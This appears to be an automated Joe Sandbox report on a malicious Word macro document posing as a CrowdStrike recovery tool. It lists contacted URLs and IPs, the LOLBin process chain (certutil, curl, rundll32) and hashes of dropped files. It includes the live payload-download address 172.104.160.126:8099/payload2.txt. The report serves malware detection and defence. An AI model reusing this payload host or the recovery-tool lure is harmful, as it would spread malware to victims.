    https://curl.se/docs/alt-svc.htmlcertutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://www.ecosia.org/newtab/V2ViIERhdGE=.16.drfalse
    • URL Reputation: safe
    unknown
    https://curl.se/docs/sslcerts.htmlcurl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/sslcerts.htmlcurlcurl.exefalse
    • Avira URL Cloud: safe
    unknown
    https://ac.ecosia.org/autocomplete?q=V2ViIERhdGE=.16.drfalse
    • URL Reputation: safe
    unknown
    https://curl.se/docs/hsts.htmlcurl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.126:8099/payload2.txtoncurl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://aka.ms/vs/17/release/vc_redist.x64.exedocument.xmlfalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/alt-svc.html#rundll32.exefalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/copyright.htmlDxcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767307922.00000000008A0000.00000002.00000001.01000000.00000007.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.126:8099/paycurl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/hsts.html#curl.exefalse
    • Avira URL Cloud: safe
    unknown
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchV2ViIERhdGE=.16.drfalse
    • URL Reputation: safe
    unknown
    http://172.104.160.126:8099/payload2.txtrcurl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.126:8099/pay0curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.126:8099/payload2.txtscurl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/Pxcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767307922.00000000008A0000.00000002.00000001.01000000.00000007.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/http-cookies.html#curl.exefalse
    • Avira URL Cloud: safe
    unknown
    http://172.104.160.126:8099/payload2.txt6curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=V2ViIERhdGE=.16.drfalse
    • URL Reputation: safe
    unknown
    http://172.104.160.126:8099/payload2.txtocurl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    239.255.255.250
    unknownReserved
    unknownunknownfalse
    172.104.160.126
    unknownUnited States
    63949LINODE-APLinodeLLCUStrue
    142.250.186.164
    www.google.comUnited States
    15169GOOGLEUSfalse
    IP
    192.168.2.6
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1478411
    Start date and time:2024-07-22 15:56:51 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 12m 59s
    Hypervisor based Inspection enabled:false
    Report type:light
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Run name:Potential for more IOCs and behavior
    Number of analysed new started processes analysed:40
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • GSI enabled (VBA)
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
    Detection:MAL
    Classification:mal100.troj.spyw.expl.evad.winDOCM@69/284@2/4
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 96%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .docm
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Browse link: https://go.microsoft.com/fwlink/?linkid=2280386
    • Scroll down
    • Close Viewer
    • Override analysis time to 240s for rundll32
    • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
    • HTTP Packets have been reduced
    • TCP Packets have been reduced to 100
    • Created / dropped Files have been reduced to 100
    • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 184.28.90.27, 192.229.221.95, 52.111.243.40, 52.111.243.42, 52.111.243.41, 52.111.243.43, 199.232.214.172, 51.105.71.136, 52.109.28.47, 95.101.111.168, 95.101.111.179, 2.18.64.220, 2.18.64.224, 142.250.184.227, 142.250.185.206, 34.104.35.123, 74.125.71.84, 184.28.89.167, 23.212.89.111, 52.109.28.48, 20.189.173.2, 52.111.231.26, 52.111.231.25, 52.111.231.24, 52.111.231.23, 20.42.73.26
    • Excluded domains from analysis (whitelisted): osiprod-uks-bronze-azsc-000.uksouth.cloudapp.azure.com, odc.officeapps.live.com, slscr.update.microsoft.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, a1847.dscg2.akamai.net, mobile.events.data.microsoft.com, e11290.dspg.akamaiedge.net, clients2.google.com, dlc-shim.trafficmanager.net, e12671.dscd.akamaiedge.net, ocsp.digicert.com, login.live.com, download.microsoft.com.edgekey.net, e16604.g.akamaiedge.net, main.dl.ms.akadns.net, onedscolprdeus09.eastus.cloudapp.azure.com, officeclient.microsoft.com, download.microsoft.com, ukw-azsc-config.officeapps.live.com, ecs.office.com, fs.microsoft.com, onedscolprduks00.uksouth.cloudapp.azure.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, uks-azsc-000.odc.officeapps.live.com, nleditor.osi.office.net, uks-azsc-000.roaming.officeapps.live.com, edgedl.me.gvt1.com, s-0005.s-msedge.net, metadata.templates.cdn.office.net, ecs.office.trafficmanager.net, clients.l.google.com, eur
    • Not all processes where analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size exceeded maximum capacity and may have missing disassembly code.
    • Report size exceeded maximum capacity and may have missing network information.
    • Report size getting too big, too many NtCreateFile calls found.
    • Report size getting too big, too many NtDeviceIoControlFile calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryAttributesFile calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Report size getting too big, too many NtReadVirtualMemory calls found.
    • Report size getting too big, too many NtSetInformationFile calls found.
    • Report size getting too big, too many NtSetValueKey calls found.
    • VT rate limit hit for: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
    No simulations
    No context
    No context
    No context
    No context
    No context
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JSON data
    Category:dropped
    Size (bytes):521377
    Entropy (8bit):4.9084889265453135
    Encrypted:false
    SSDEEP:3072:gdTb5Sb3F2FqSrfZm+CnQsbzxZO7aYb6f5780K2:wb5q3umBnzT
    MD5:C37972CBD8748E2CA6DA205839B16444
    SHA1:9834B46ACF560146DD7EE9086DB6019FBAC13B4E
    SHA-256:D4CFBB0E8B9D3E36ECE921B9B51BD37EF1D3195A9CFA1C4586AEA200EB3434A7
    SHA-512:02B4D134F84122B6EE9A304D79745A003E71803C354FB01BAF986BD15E3BA57BA5EF167CC444ED67B9BA5964FF5922C50E2E92A8A09862059852ECD9CEF1A900
    Malicious:false
    Preview:{"MajorVersion":4,"MinorVersion":40,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
    Category:dropped
    Size (bytes):773040
    Entropy (8bit):6.55939673749297
    Encrypted:false
    SSDEEP:12288:Zn84XULLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/cLQ/zhm1kjFKy6Nyjbqq+:N8XPDs5+ivOXgo1kYvyz2
    MD5:4296A064B917926682E7EED650D4A745
    SHA1:3953A6AA9100F652A6CA533C2E05895E52343718
    SHA-256:E04E41C74D6C78213BA1588BACEE64B42C0EDECE85224C474A714F39960D8083
    SHA-512:A25388DDCE58D9F06716C0F0BDF2AEFA7F68EBCA7171077533AF4A9BE99A08E3DCD8DFE1A278B7AA5DE65DA9F32501B4B0B0ECAB51F9AF0F12A3A8A75363FF2C
    Malicious:false
    Preview:........... OS/29....(...`cmap.s.,.......pglyf..&....|....head2..........6hheaE.@v.......$hmtx...........@loca.U.....8...Dmaxp........... name.P+........post...<...... .........b~1_.<...........<......r......Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................k......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with very long lines (1298), with no line terminators
    Category:modified
    Size (bytes):1298
    Entropy (8bit):5.077301845740677
    Encrypted:false
    SSDEEP:24:2dtatFtAzXR0X5qBiX5qGXX5qyjX5qgZX5q4d3X5qsHX5qfYX5qO:cGEbRNBfGQyEg+4dwsgfJO
    MD5:70EFA566464C23B4E36A63A2E54795F1
    SHA1:71D018AAF38ED9178717D2871810F8FDF4A5FA88
    SHA-256:186DF18340B77010991449EA87475CAE6651432084C1AFC7AFE5AEE779B42DDF
    SHA-512:BA840DF32DB645E461392400DA7F01AC57EB2F722D1A7C8AD22551D8B83FAB38EE69D328248871905791F23FA8604A48F7DBD3DDD231C3E506B5D5C1134C5712
    Malicious:false
    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?><root><version>1</version><Count>8</Count><Resource><Id>inkeffectsilver_0</Id><LAT>2024-07-22T13:58:48Z</LAT><key>inkeffectsilver.jpg</key><folder>Graphics</folder><type>10</type></Resource><Resource><Id>inkeffectrosegold_0</Id><LAT>2024-07-22T13:58:48Z</LAT><key>inkeffectrosegold.jpg</key><folder>Graphics</folder><type>10</type></Resource><Resource><Id>inkeffectgold_0</Id><LAT>2024-07-22T13:58:48Z</LAT><key>inkeffectgold.jpg</key><folder>Graphics</folder><type>10</type></Resource><Resource><Id>inkeffectlava_0</Id><LAT>2024-07-22T13:58:48Z</LAT><key>inkeffectlava.jpg</key><folder>Graphics</folder><type>10</type></Resource><Resource><Id>inkeffectgalaxy_0</Id><LAT>2024-07-22T13:58:48Z</LAT><key>inkeffectgalaxy.jpg</key><folder>Graphics</folder><type>10</type></Resource><Resource><Id>inkeffectbronze_0</Id><LAT>2024-07-22T13:58:48Z</LAT><key>inkeffectbronze.jpg</key><folder>Graphics</folder><type>10</type></Resource><Resource><Id>inkef
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 540x540, components 3
    Category:dropped
    Size (bytes):51359
    Entropy (8bit):7.951666710600864
    Encrypted:false
    SSDEEP:1536:R0RcgzFbKPP60jIl5/IwaJczf3CtvRX5/wWi5:bgxbKPid/IwnzqJ5E5
    MD5:C78ADBD2D46B0E9C1D82F07CE097886C
    SHA1:FB1112D34E16E16AEE78EEDD4FC646ED9BE2AF93
    SHA-256:AEBFCC397AEF37AFE927595078B879AB56A3EEA1725B49E5716DEBCE74B8757C
    SHA-512:0EE4D259906BA938FAF8C1A0ED1A77FB4AD16313839B8790955448F7219806B4B70BA318A359F4724031C62300D4A24E0C63CFEE233EF25B3AE907F5F09AB89B
    Malicious:false
    Preview:......Exif..II*.................Ducky..............http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="adobe:docid:photoshop:cf966bc7-2e03-1179-b805-d8edc999fcb6" xmpMM:DocumentID="xmp.did:630AA0AD350711E7A8B5D05185B6C702" xmpMM:InstanceID="xmp.iid:630AA0AC350711E7A8B5D05185B6C702" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:93DCC65027C411E7BFED96D58044CBC1" stRef:documentID="xmp.did:93DCC65127C411E7BFED96D58044CBC1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............!.!4..4B/)/B=3223=FFFFFF
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 540x540, components 3
    Category:dropped
    Size (bytes):39125
    Entropy (8bit):7.979802521866709
    Encrypted:false
    SSDEEP:768:WCjr07kqJ96I8cTgooRTYWHj3FkbeP2rcZ7EHA6s5:507kq2SEo+TLjTw+7EHTe
    MD5:239B06776C5028E8696BE5DDE3056F40
    SHA1:5BA5F0F7762296CBC0A066608E611AAA4D386F75
    SHA-256:D8A45BC6BD592ED29DC7F74666B6C22D4ADDCA52261FDF2A929CE7205FC4EFCA
    SHA-512:7B5319E22DC8D422C9974A6DE23B094CCBC89861FFBBA85C5A19137B1A7CE3224E34978F2AF5777BB357571379B998DCBB30951DBEF32BBFE8C73929D2F90B86
    Malicious:false
    Preview:......JFIF..............................)&""&)>,0,0,>^;E;;E;^SeRMReS.vhhv...............................)&""&)>,0,0,>^;E;;E;^SeRMReS.vhhv.........................."..............................................BKB.@..h.Z.Z....ker..Xd!.E........y.e.<...tNoK...:..B..R...,.uAM....H..Rd..h....%Q...'#.......JRcN..pGL{3.1....!C.8..y.R..3....$.%..H.......eoG..\..M.........5..........c.F{....j.....&?J.*.ad..Y3[..2\..5)+..Qh....g.)....biQ$@..uCV..0.&+..#..,.B...JR.|lp.C...{.V.;N$.m.w.j..;"..:.$....Z.sj...!,m..G5...l...Y.l/.J....:.=.;u,:.G.....u/.u.u.#5..Y.C....DI......t..B.....f..v(t.......0H..M.d.5e.J.l..(...C.K-...S4..HR.uz>....f.q.jU..$..q.....QG....%.=.@....\.t....v....f...r:;[.n..W/.&....._..Q?o9.S.....s.Y....T..yT...;T..c.G.Lk..tf.0 ..x.".#Ptw%n!.P......%.]+yWb`lY.y&k...t..pr1=I.Z.A....i.......I..k.{.!.G8........vi1]./\.6_....Z...:X..1...u ..\.n...<.-}...D.>q..G...F......?Z.V.\..hX.....#.Ec...H..s...m...\..6.[V&.V.Fwv4G6.!%.Yg...3...7.m.
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 540x540, components 3
    Category:dropped
    Size (bytes):45967
    Entropy (8bit):7.9705077862907885
    Encrypted:false
    SSDEEP:768:IuC14Fy5SyHdNNbx4IsRctKVqjrk+wiM6SNlM3jDbS+TFhNdc:IuC+RkRSjyxoPNl6DbSqhNdc
    MD5:041305375CE26DE66A1405C06819D3CD
    SHA1:4448296BBA3BD8ACF34D1AF5C4CFEBDFD6B07919
    SHA-256:4BB1E1D1139CAFDD96D4C98F78086B3677A68A90ABCACE31250F1442C9E528B0
    SHA-512:F15A172058470337F9EA00F5757A605A0A069A7C232BA6015B2839CEC27DCEA30E81BEFD811AC15D9B442648FFD9F07B82B1E104F86890C2F2680242EC32958A
    Malicious:false
    Preview:......JFIF..............................+'$$'+A.2.2.Ac=H==H=cWjVPVjW.{mm{................................+'$$'+A.2.2.Ac=H==H=cWjVPVjW.{mm{..........................."..............................................rZ.5E[.lH...Nn..r..chh9.E.`..]9...!xS[.{...G.i.vUG.d!+Pu#. .%sF.GE.*.....W..&...zo..l...og....F.Q..H......=....=.q.....x...R..P.)V..<.....L......>Y."O=.T.."s..Y...gtx..r..A....oAUg*>.c....hx.1.gF.u..,.|.yPT.R......B....$!...,.P..=$t..@...V5I.i..j..s55.+.BBMJ.<4I.F|.j.>..Tq..$....|....f|r.y./e.]:9;/........i.t..6...D.I.......Qs.CU.0.KP,..J...N.A-Y.........qp.+..._6Y.}..-5.5E#.x..J...+.R*J..X....Tc.o.I....1...Fp."...J+..L...8.l.k...{..'.L..X...Vu.t.h..$h..;."=f.c......uj.*..1...4..:..pb....N...D...zn[.X-v...X.g....C,.].UaX.Q...."..=4.\e.V.~.5.....qI.....T/M.Hl.F.y.S%E]f.G.<....+p...5U.kT|.Gs..z=.D...n.|.t~..)..2.:.........B.Jf.S..C.#.........J.Y...-..U..k..A.K...V.@.GEpb...d.....W...D......#.....'X..J....'.i.Kw..+.6.#+..J....,.}B.Tbh.i
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 540x540, components 3
    Category:dropped
    Size (bytes):46495
    Entropy (8bit):7.9661137194510605
    Encrypted:false
    SSDEEP:768:VQ++TcRGfH5eNodvzDnMex2FzuOojrl+X4H+91i57BR/SUcKkuMw2D:cTmQHICzA7ijrlZ+9g57BZSUcKk5ww
    MD5:437A5A184681BCFC608FD1E97D708616
    SHA1:7D84FBE6D4DED5A3C98414F458CE071BBC9035BB
    SHA-256:D1F0B68D87F6B09555851C30F0352A07952B5B0885EFB8D3E3FF5CEE4279E87B
    SHA-512:6B2D7542117A4F4DA956CB7EF4C09F69728F793C0DE6BAAC6790F73E923600EABA0FC54D1C7082483244EF1DA0246158C69143CD297FA08131B302AAD04B5003
    Malicious:false
    Preview:......Exif..II*.................Ducky.......2......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:9ddd68a3-599c-c447-b762-dfdcc6ed67f0" xmpMM:DocumentID="xmp.did:6DA3B3432F9611E79EC5C8FB588A0A7D" xmpMM:InstanceID="xmp.iid:6DA3B3422F9611E79EC5C8FB588A0A7D" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:171e06c7-6010-1747-9ee0-2032452c22f2" stRef:documentID="adobe:docid:photoshop:647e5738-1e35-11e7-9c56-d2f51c83e137"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 540x540, components 3
    Category:dropped
    Size (bytes):51762
    Entropy (8bit):7.969551469107947
    Encrypted:false
    SSDEEP:1536:2RjFVIGWSX55YGjQQq35KuAt85LMn7Tz+dR8jG/t:2RhVIiiWQ9sxnLGR8jG/t
    MD5:B3DB04E08D530D82F33A9B09EA528595
    SHA1:C503E80D02BACAC44C1E53D2C2289F5702B0C829
    SHA-256:35711A8D24732AEB50300EACD3E231BFD5676D6575830240BF7111BFF040B9E5
    SHA-512:C6B66DC04793FFAD8C7CEE1908334C664D122B6D444B8ED534E20E5FA3A7ED22062697C759BD8236910BD5E88D321D11C4BAC7EF40B64E3E69620AA7AEF26B1D
    Malicious:false
    Preview:......Exif..II*.................Ducky..............http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:bbfa45cd-c1f9-7e4b-bdf0-5a08d3643b82" xmpMM:DocumentID="xmp.did:7E9BDF902F9611E79068964DF66B6A5F" xmpMM:InstanceID="xmp.iid:7E9BDF8F2F9611E79068964DF66B6A5F" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:bfdf1a42-cec7-c342-962a-2f28aa7f0712" stRef:documentID="adobe:docid:photoshop:21012dab-1e31-11e7-9c56-d2f51c83e137"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 540x540, components 3
    Category:dropped
    Size (bytes):77636
    Entropy (8bit):7.98325572479678
    Encrypted:false
    SSDEEP:1536:GQvLaOfOKaf5ZKLzFxDZsDYlV4uCD258Vds+7RWiakyvggK:mOOKahZoZqY+uDCVe+Aizye
    MD5:DEE12646BC7E105B3A97555A5AD46F1F
    SHA1:D3C1F8FAFD06682514F2A88B5DD4B2D0BB1C9D0A
    SHA-256:F47061DFB3F3312AF65E739C09EF51B0F0C2DE21FDCD344C35B5E9C37665CFD2
    SHA-512:3A94C1975B50995BC368376423203F072417C83C4A65312122C0258075EFA6C0686D01A4B9CEF67D30012D0509DBA69D03921E9E6A6171C1F9E52690D5C2CF7B
    Malicious:false
    Preview:......JFIF.............................."...."4%(%(%4N191191NETD?DTE|bVVb|.yry..........................."...."4%(%(%4N191191NETD?DTE|bVVb|.yry......................"..............................................\.gI.:SI1F....Q..)._.t...9..l..5..++T).R..lQk<..H}.mS.Z.~..d......r~...W+.\.b9.i.A......Q..D.w.|..#k*......3.&*V[d...UD3..Gw?G.........T..a....m.Zi..Q4.ltL.].-......j.B.F.+..gN9......ch4.3.D.s..w..Vy..lRm..qh-rP...u.....+....=.2..i.h..dz:...z.,F..;....b..Im..c.5.#.=.......7.....\..G..]l...O3R1?.....r.i.'..~.h...|.R.j.p0y../F.iR..:......iK.m.X..`".:.4v..........i......9.0..l}><..6..".*..SEc....0u.r.&...Cl...S..f.|....v...-.v.lA.y....8........F58.>|.W?..)..X:........]2...3R...s.\.S..".&...g....H..rT......XR4.K..L..=.......#..C'...._>-.S.RRoH.]..B>'...{.9.^K.u./y..Q3Z...g......?.f#X....yoK.%X.`P`K/;:..u-.4..+....."_Q..kU..:...._.@5..&X.t..J....e...t.`.k.."HZ...V.gln....b .....U.0.>.jk.b\t.R...^..C.N.........w..-.AqEk...c.f...[Cw\.XKF...{.......'.9.
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 540x540, components 3
    Category:dropped
    Size (bytes):42587
    Entropy (8bit):7.956158176110853
    Encrypted:false
    SSDEEP:768:33uVCSrPcSrBbXGFz+dT+YrUjmJ3/Tm14bFXBFfP+EIbeIIoAuYY4so2/EKchzum:33uV74StXhSYrUiJvTsCNjNIbz6pAEKk
    MD5:481D6C397EC9255C7158948ECAEE6585
    SHA1:F6692C7064A6E54991283963DA5190C179753D19
    SHA-256:EDE39E66268900159B6B80106B11EF74539F5077D8206DEEAD9B98E8F3CFD176
    SHA-512:5B4BC810879E55F712E0E860FB4D4ADE54297DC574C1658CD3E61EDC8D0AAD9B0EFED16EAA347B663F1271207BD2B858B8644B333BE98CFB0C6536279A8950BE
    Malicious:false
